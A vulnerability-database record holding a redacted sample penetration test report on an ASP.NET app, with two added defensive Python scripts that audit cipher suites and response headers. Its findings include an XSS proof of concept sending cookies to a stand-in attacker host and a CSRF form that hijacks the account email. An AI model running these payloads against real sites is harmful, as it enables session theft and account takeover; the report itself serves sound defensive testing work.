{"uuid": "ba399fd2-17ab-4a17-8585-f488d97852dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://gist.github.com/tejassesh5/26e63dfa642914dd0891e872144d7d4e", "content": "\n\n\n\nWeb Application Penetration Test Report \u2014 SAMPLE\n\n\n\nConfidential \u2014 Redacted Sample\n\nWeb Application Penetration Test Report\n\nOWASP Top 10 \u00b7 Session Management \u00b7 TLS Configuration \u00b7 SOC 2 Alignment\n\n      Client: REDACTED CLIENT LTD\n      Target Application: https://app.REDACTED.com\n      Environment: Production (read-only scope)\n      Test Period: XX/XX/202X to XX/XX/202X\n      Report Version: 1.0 Final\n      Prepared By: Tejas D. \u00b7 Independent Security Consultant\n      Classification: CONFIDENTIAL \u2014 Client Eyes Only\n\nPENTEST REPORT\n\nThis document is confidential. Unauthorized distribution prohibited.\n\n\n\n1. Executive Summary\n\n\nAn independent web application penetration test was conducted against REDACTED's core business platform. Testing followed OWASP Testing Guide v4.2 and aligned with SOC 2 Type II security control requirements.\n\nSix vulnerabilities were identified: 1 High, 2 Medium, 2 Low, 1 Informational. No critical vulnerabilities were found. The most significant finding (FIND-01) allows an attacker to execute arbitrary JavaScript in an authenticated user's browser session, potentially enabling session hijacking or credential theft.\n\nAll findings include proof-of-concept evidence, CVSS v3.1 scores, and actionable remediation guidance. A retest is recommended within 30 days of remediation deployment.\n\n\n\n2. 
Scope & Methodology\n\n\n  Phase | Activities | Duration\n  Reconnaissance | Tech fingerprinting, sitemap enumeration, passive recon | Day 1\n  Authentication | Login brute-force protection, account lockout, password reset | Day 1-2\n  Session Management | Cookie analysis, token entropy (Burp Sequencer), fixation | Day 2\n  Input Validation | XSS, SQLi, XXE, SSRF across all user-controlled parameters | Day 2-3\n  Access Control | Horizontal/vertical privilege escalation, IDOR | Day 3\n  Transport Security | TLS version/cipher enumeration, HSTS, certificate validation | Day 3\n  Error Handling & Headers | Verbose errors, security header audit, clickjacking | Day 4\n  Report | Documentation, evidence compilation, remediation guidance | Day 5\n\n\n\n3. Risk Summary\n\n\n  0 Critical \u00b7 1 High \u00b7 2 Medium \u00b7 2 Low \u00b7 1 Info\n\n\n  ID | Title | Severity | CVSS v3.1 | OWASP\n  FIND-01 | Reflected XSS via Search Parameter | High | 8.2 | A03:2021\n  FIND-02 | CSRF: Missing Anti-Forgery Tokens | Medium | 6.1 | A01:2021\n  FIND-03 | Session Cookie Missing HttpOnly/SameSite | Medium | 5.3 | A07:2021\n  FIND-04 | TLS: Weak Cipher Suites Accepted (SWEET32) | Low | 3.7 | A02:2021\n  FIND-05 | Verbose .NET Stack Trace Disclosure | Low | 3.1 | A05:2021\n  FIND-06 | Missing HTTP Security Headers | Info | \u2014 | A05:2021\n\n\n\n4. Detailed Findings\n\n\n\nFIND-01 \u00b7 A03:2021 Injection \u00b7 CWE-79\nReflected Cross-Site Scripting (XSS) \u2014 Search Parameter\nHigh \u00b7 CVSS 8.2 (the score the stated vector AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N evaluates to) \u00b7 Affected: /search?q=\n\nDescription\n\nThe q parameter on the search endpoint reflects user-supplied input directly into the HTML response without encoding. 
An attacker can craft a malicious URL causing arbitrary JavaScript to execute in an authenticated victim's browser session.\n\nProof of Concept\n\nGET /search?q=<script>document.location='https://[attacker]/c?d='+document.cookie</script>\nHost: app.REDACTED.com\nCookie: .ASPXAUTH=REDACTED\n\n[Evidence redacted: screenshot of alert() PoC and cookie exfiltration in test environment available on request]\n\nImpact\n\nSession token theft, credential phishing, keylogging. Combined with FIND-03 (missing HttpOnly), severity approaches Critical \u2014 attacker can extract full session cookie via document.cookie.\n\nCVSS Vector\n\nCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\n\nRemediation\nHTML-encode all user output via HttpUtility.HtmlEncode() or Razor built-in encoding. Implement CSP script-src 'self' as defense-in-depth. Allowlist/validate q parameter server-side. Target: 7 days.\n\n\n\nFIND-02 \u00b7 A01:2021 Broken Access Control \u00b7 CWE-352\nCSRF: Missing Anti-Forgery Tokens on State-Changing Requests\nMedium \u00b7 CVSS 6.1 \u00b7 Affected: /account/update-email, /account/change-password\n\nDescription\n\nBoth listed POST endpoints modify account state without an anti-CSRF token and without validating the Origin or Referer headers. 
Browsers automatically include session cookies in cross-origin requests. Chromium-based browsers treat a cookie with no SameSite attribute as Lax by default (with a short-lived exception for freshly set cookies), which blocks a cross-site top-level POST; confirm exploitability in each browser the client supports, since the Burp Repeater confirmation below is not subject to browser cookie policy.\n\nProof of Concept\n\n<!-- Attacker page -->\n<form action=\"https://app.REDACTED.com/account/update-email\" method=\"POST\">\n  <input type=\"hidden\" name=\"email\" value=\"attacker@evil.com\">\n</form>\n<script>document.forms[0].submit();</script>\n\n[Burp Repeater response redacted: 200 OK confirming email changed in test account]\n\nImpact\n\nVictim visits attacker page \u2192 email changed to attacker address \u2192 password reset triggered \u2192 full account takeover. SOC 2 CC6.1 control gap.\n\nRemediation\nAdd [ValidateAntiForgeryToken] to all state-changing controller actions. Include @Html.AntiForgeryToken() in forms. Use synchronizer token pattern for API endpoints. Target: 14 days.\n\n\n\nFIND-03 \u00b7 A07:2021 Auth Failures \u00b7 CWE-1004\nSession Cookie Missing HttpOnly and SameSite Flags\nMedium \u00b7 CVSS 5.3 \u00b7 Affected: ASP.NET_SessionId, .ASPXAUTH\n\nDescription\n\nBoth session cookies lack HttpOnly and SameSite attributes. Secure flag is present. Missing HttpOnly allows JavaScript to read cookie values directly from document.cookie.\n\nEvidence\n\nSet-Cookie: ASP.NET_SessionId=REDACTED; path=/; Secure\nSet-Cookie: .ASPXAUTH=REDACTED; expires=...; path=/; Secure\n# HttpOnly and SameSite ABSENT from both cookies\n\nConfirmed via Burp Suite response interceptor and Chrome DevTools Application > Cookies panel.\n\nImpact\n\nChained with FIND-01 (XSS): attacker extracts session token via document.cookie, hijacks authenticated session. Without SameSite, FIND-02 (CSRF) also more effective. Combined severity Critical.\n\nRemediation\nIn web.config: <httpCookies httpOnlyCookies=\"true\" sameSite=\"Strict\" requireSSL=\"true\"/>. 
For forms auth: add cookieSameSite=\"Strict\" (and the same attribute on <sessionState> for ASP.NET_SessionId). These attributes require .NET Framework 4.7.2 or later. SameSite=Strict drops the cookie on top-level navigations arriving from other sites, so users following an external link into the app will appear logged out; if that is unacceptable, Lax still blocks the cross-site POST in FIND-02. Verify post-deploy: IIS config and app-level settings can conflict. Target: 7 days.\n\n\n\nFIND-04 \u00b7 A02:2021 Cryptographic Failures \u00b7 CWE-326 \u00b7 CVE-2016-2183\nTLS: Weak Cipher Suites Accepted (3DES / SWEET32)\nLow \u00b7 CVSS 3.7\n\nDescription\n\nServer accepts TLS 1.2 connections using 3DES and CBC-mode AES suites without forward secrecy. TLS 1.3 is supported and preferred, but legacy suites remain negotiable. SWEET32 (CVE-2016-2183) is a birthday attack on 64-bit block ciphers such as 3DES: after roughly 2^32 blocks (tens of gigabytes) on one long-lived connection, a block collision reveals plaintext; the traffic volume required is why the score is Low, but the suite still has to go.\n\nEvidence\n\n# testssl.sh:\nTLS 1.2   TLS_RSA_WITH_3DES_EDE_CBC_SHA        WEAK\nTLS 1.2   TLS_RSA_WITH_AES_128_CBC_SHA          WEAK (no forward secrecy)\nTLS 1.3   TLS_AES_256_GCM_SHA384                OK\n\n# Manual forced negotiation:\n$ openssl s_client -connect app.REDACTED.com:443 -cipher DES-CBC3-SHA\nCipher: DES-CBC3-SHA    [connected -- not rejected]\n\nRemediation\nDisable legacy ciphers via IIS Crypto. Retain only: TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256 (TLS 1.3), TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (TLS 1.2). Confirm that no supported client still depends on a removed suite before enforcing the list. Verify with Qualys SSL Labs. 
Target: 30 days.\n\n\n\nFIND-05 \u00b7 A05:2021 Security Misconfiguration \u00b7 CWE-209\nVerbose Error Pages: .NET Stack Trace Disclosure\nLow \u00b7 CVSS 3.1 \u00b7 Affected: multiple endpoints on malformed input\n\nDescription\n\nMalformed input to integer parameters triggers full ASP.NET stack traces exposing internal namespaces, server file paths, and framework version strings.\n\nEvidence\n\nSystem.FormatException: Input string was not in a correct format.\n   at REDACTED.Controllers.ReportController.GetById(String id)\n   at C:\\inetpub\\wwwroot\\REDACTED\\Controllers\\ReportController.cs:line 47\nServer: Microsoft-IIS/10.0    ASP.NET Version: 4.8.xxxx\n\nRemediation\nSet customErrors mode=\"On\" in web.config with generic error pages. Add global exception handler returning sanitized responses. Remove Server and X-Powered-By response headers. Target: 14 days.\n\n\n\nFIND-06 \u00b7 A05:2021 \u00b7 CWE-693 \u00b7 Informational\nMissing HTTP Security Headers\nInfo \u00b7 Affected: All responses\n\n  Header | Recommended Value | Risk if Absent\n  X-Frame-Options | DENY | Clickjacking\n  Content-Security-Policy | default-src 'self' | XSS amplification\n  Strict-Transport-Security | max-age=31536000; includeSubDomains | SSL stripping\n  X-Content-Type-Options | nosniff | MIME sniffing\n  Referrer-Policy | strict-origin-when-cross-origin | URL leakage\n\nRemediation\nAdd headers via IIS web.config under <httpProtocol><customHeaders>. Deploy CSP in report-only mode first. Verify at SecurityHeaders.com. Target: 30 days.\n\n\n\n5. 
Remediation Roadmap\n\n\n  Priority | Finding | Effort | Target | SOC 2 Control\n  P1 | FIND-01: XSS | Low (output encoding) | 7 days | CC6.1, CC6.6\n  P1 | FIND-03: Cookie Flags | Low (config change) | 7 days | CC6.1, CC6.7\n  P2 | FIND-02: CSRF Tokens | Medium | 14 days | CC6.1, CC6.6\n  P2 | FIND-05: Error Disclosure | Low (config change) | 14 days | CC7.2\n  P3 | FIND-04: TLS Ciphers | Low (IIS Crypto) | 30 days | CC6.7\n  P4 | FIND-06: Headers | Low (web.config) | 30 days | CC6.1\n\n\nRetest recommended within 30 days of remediation deployment to verify all findings resolved prior to SOC 2 audit submission.\n\n\n6. Appendix: Tools & References\n\n\n  Tool | Purpose\n  Burp Suite Pro | Proxy, Intruder, Repeater, Sequencer, Scanner\n  OWASP ZAP 2.14 | Active scan, passive analysis\n  testssl.sh 3.0.9 | TLS/cipher enumeration\n  nmap 7.94 | Port scan, ssl-enum-ciphers NSE script\n  nikto 2.1.6 | Web server misconfiguration baseline\n  sqlmap 1.8 | SQL injection verification (non-destructive)\n  jwt_tool 2.2.7 | JWT token analysis and manipulation\n  curl / httpie | Manual request crafting\n  Chrome DevTools | Cookie inspection, DOM analysis, network tab\n\n\n\nStandards referenced: OWASP Testing Guide v4.2 \u00b7 OWASP Top 10 2021 \u00b7 CVSS v3.1 (FIRST.org) \u00b7 NIST SP 800-115 \u00b7 SOC 2 TSC (AICPA 2017) \u00b7 Microsoft IIS Security Best Practices\n\n\nSAMPLE REPORT \u2014 REDACTED FOR PORTFOLIO USE \u2014 CONFIDENTIAL \u2014 Prepared by Tejas D. \u00b7 Independent Security Consultant\n\n\n\n", "creation_timestamp": "2026-06-23T16:29:40.000000Z"}
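The FIND-04 evidence (the CVE-2016-2183 sighting this record tracks) and its retain-only remediation list, turned into a repeatable check. This is an added example, not code from the report, from testssl.sh or from IIS Crypto: it parses scanner lines of the form shown in the finding's evidence, applies the finding's own reasoning (64-bit block cipher, static RSA key exchange, CBC mode, deprecated protocol) to each negotiable suite, and then diffs the result against the remediation allowlist so the output is the exact set of suites to disable. The sample scanner lines are constructed here, and the classification rules are this example's reading of the finding, not a scanner's verdict.

```python
"""Cipher-suite policy check over testssl.sh-style lines (added example, not report code)."""
import re
from dataclasses import dataclass

# Constructed sample modelled on the FIND-04 evidence; not real scanner output.
SAMPLE_TESTSSL_OUTPUT = """\
TLS 1.2   TLS_RSA_WITH_3DES_EDE_CBC_SHA         WEAK
TLS 1.2   TLS_RSA_WITH_AES_128_CBC_SHA          WEAK (no forward secrecy)
TLS 1.2   TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 OK
TLS 1.3   TLS_AES_256_GCM_SHA384                OK
"""

# The suites FIND-04's remediation says to retain; everything else negotiable must go.
REMEDIATION_ALLOWLIST = frozenset({
    "TLS_AES_256_GCM_SHA384",
    "TLS_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
})

# "<protocol>   <IANA suite name>   <verdict...>"; the verdict column is ignored.
LINE_RE = re.compile(r"^(SSLv3|TLS 1\.[0-3])\s+(TLS_[A-Z0-9_]+)")


@dataclass(frozen=True)
class SuiteVerdict:
    version: str
    suite: str
    issues: tuple  # empty tuple means the suite passes the policy


def classify(version: str, suite: str) -> SuiteVerdict:
    """Apply the FIND-04 policy to one negotiable (protocol, suite) pair."""
    issues = []
    # SWEET32 (CVE-2016-2183): 64-bit block ciphers leak plaintext after ~2^32
    # blocks on one connection. 3DES is the usual survivor; DES and IDEA share the block size.
    if "3DES" in suite or "_DES_" in suite or "IDEA" in suite:
        issues.append("SWEET32: 64-bit block cipher (CVE-2016-2183)")
    if "RC4" in suite or "_NULL_" in suite or "EXPORT" in suite:
        issues.append("broken or null cipher")
    # TLS 1.3 suites always use (EC)DHE; for earlier versions the name must say so.
    if version != "TLS 1.3" and not suite.startswith(("TLS_ECDHE_", "TLS_DHE_")):
        issues.append("no forward secrecy (static key exchange)")
    if "_CBC_" in suite:
        issues.append("CBC mode (MAC-then-encrypt, padding-oracle class)")
    if version in ("SSLv3", "TLS 1.0", "TLS 1.1"):
        issues.append(f"deprecated protocol {version}")
    return SuiteVerdict(version, suite, tuple(issues))


def evaluate(scanner_output: str) -> list:
    """Classify every suite line in the scanner output; non-matching lines are skipped."""
    verdicts = []
    for line in scanner_output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            verdicts.append(classify(m.group(1), m.group(2)))
    return verdicts


def sweet32_exposed(verdicts) -> bool:
    """True if any negotiable suite carries the SWEET32 issue."""
    return any(i.startswith("SWEET32") for v in verdicts for i in v.issues)


def suites_to_disable(verdicts, allowlist=REMEDIATION_ALLOWLIST) -> list:
    """Negotiable suites outside the allowlist, in scanner order, without duplicates."""
    seen, out = set(), []
    for v in verdicts:
        if v.suite not in allowlist and v.suite not in seen:
            seen.add(v.suite)
            out.append(v.suite)
    return out


if __name__ == "__main__":
    results = evaluate(SAMPLE_TESTSSL_OUTPUT)
    for v in results:
        print(f"{v.version:8} {v.suite:40} {'; '.join(v.issues) or 'OK'}")
    print("SWEET32 exposed:", sweet32_exposed(results))
    print("disable:", suites_to_disable(results))
```

Feed it the suite section of a real testssl.sh or `nmap --script ssl-enum-ciphers` run (after converting the latter's names to the same IANA form) and re-run it at retest: a passing retest is an empty `suites_to_disable` list and `sweet32_exposed` returning False.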
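The cookie-attribute check behind FIND-03, the header disclosure FIND-05 asks to remove, and the header table in FIND-06, combined into one response audit that can be run over a proxy-captured response at retest. This is an added example, not code from the report or from Burp Suite; the two embedded responses are constructed (one modelled on the FIND-03 evidence, one showing the same response after the listed remediations), the cookie names are the ones the report names, and the header checks (DENY or SAMEORIGIN, nosniff, an HSTS max-age of at least one year) are this example's reading of the FIND-06 table.

```python
"""Response audit for the FIND-03 / FIND-05 / FIND-06 checks (added example, not report code)."""
import re

SESSION_COOKIES = {"asp.net_sessionid", ".aspxauth"}          # names from FIND-03
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version")  # FIND-05 asks for these removed
ONE_YEAR = 31536000


def _hsts_problem(value):
    m = re.search(r"max-age=(\d+)", value, re.I)
    if not m:
        return "no max-age"
    if int(m.group(1)) < ONE_YEAR:
        return f"max-age {m.group(1)} below one year"
    return None


# Header name and a check returning a problem string or None (values from the FIND-06 table).
REQUIRED_HEADERS = (
    ("x-frame-options", lambda v: None if v.upper() in ("DENY", "SAMEORIGIN") else f"weak value {v!r}"),
    ("content-security-policy", lambda v: None),
    ("strict-transport-security", _hsts_problem),
    ("x-content-type-options", lambda v: None if v.lower() == "nosniff" else f"unexpected value {v!r}"),
    ("referrer-policy", lambda v: None),
)

# Constructed sample modelled on the FIND-03 evidence; not a captured response.
VULNERABLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=REDACTED; path=/; Secure
Set-Cookie: .ASPXAUTH=REDACTED; expires=Fri, 01-Jan-2027 00:00:00 GMT; path=/; Secure
"""

# Constructed: the same response after the FIND-03, FIND-05 and FIND-06 remediations.
HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=REDACTED; path=/; Secure; HttpOnly; SameSite=Lax
Set-Cookie: .ASPXAUTH=REDACTED; path=/; Secure; HttpOnly; SameSite=Lax
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
"""


def parse_headers(raw):
    """(status line, [(lowercased name, value), ...]) keeping order and repeated headers."""
    lines = raw.lstrip("\r\n").splitlines()
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block; body is ignored
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def cookie_problems(set_cookie):
    """Cookie name and the protective attributes it lacks (HttpOnly, Secure, SameSite)."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {k.strip().lower(): v.strip() for k, _, v in (p.partition("=") for p in parts[1:])}
    missing = [flag for flag, key in (("HttpOnly", "httponly"), ("Secure", "secure")) if key not in attrs]
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):  # SameSite=None is an opt-out
        missing.append("SameSite")
    return name, missing


def audit_response(raw):
    """Every finding for one response, as human-readable strings; empty list means clean."""
    _, headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            cname, missing = cookie_problems(value)
            if cname.lower() in SESSION_COOKIES and missing:
                findings.append(f"cookie {cname} missing {', '.join(missing)}")
    present = dict(headers)  # last value wins; fine for the single-valued headers checked below
    for hname, check in REQUIRED_HEADERS:
        if hname not in present:
            findings.append(f"missing header {hname}")
        elif (problem := check(present[hname])):
            findings.append(f"header {hname}: {problem}")
    for hname in DISCLOSING_HEADERS:
        if hname in present:
            findings.append(f"version disclosure via {hname}: {present[hname]}")
    return findings


if __name__ == "__main__":
    for label, raw in (("vulnerable", VULNERABLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(raw) or ["no findings"])
```

Only the two session cookies are held to the cookie policy, so a non-sensitive preference cookie without HttpOnly does not drown out the real finding; the disclosure check is deliberately last because it is the lowest-severity item in the report. Run it against the login response and one authenticated page at retest, since the auth cookie is set on the former and the headers must be present on the latter.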